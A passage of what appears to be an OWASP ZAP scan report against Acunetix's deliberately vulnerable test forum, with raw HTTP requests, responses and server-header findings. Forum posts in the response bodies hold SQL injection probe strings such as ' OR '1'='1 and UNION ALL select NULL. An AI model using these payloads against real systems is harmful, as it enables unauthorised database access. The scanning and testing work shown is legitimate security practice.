Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=18 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:40 GMT Content-Length: 3066 |
| Response Body - size: 3,066 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=2</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=19 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=19 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=19 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:40 GMT Content-Length: 3069 |
| Response Body - size: 3,069 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' OR '1'='1</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=2 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=2 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:36 GMT Content-Length: 3068 |
| Response Body - size: 3,068 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=1 -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=20 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=20 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=20 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:40 GMT Content-Length: 3070 |
| Response Body - size: 3,070 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='2</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=21 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=21 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=21 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:41 GMT Content-Length: 3069 |
| Response Body - size: 3,069 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" OR "1"="1</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=22 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=22 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=22 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:41 GMT Content-Length: 3070 |
| Response Body - size: 3,070 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="2</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=23 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=23 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=23 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:41 GMT Content-Length: 3084 |
| Response Body - size: 3,084 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> UNION ALL select NULL -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=24 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=24 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=24 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:41 GMT Content-Length: 3085 |
| Response Body - size: 3,085 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' UNION ALL select NULL -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=25 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=25 HTTP/1.1
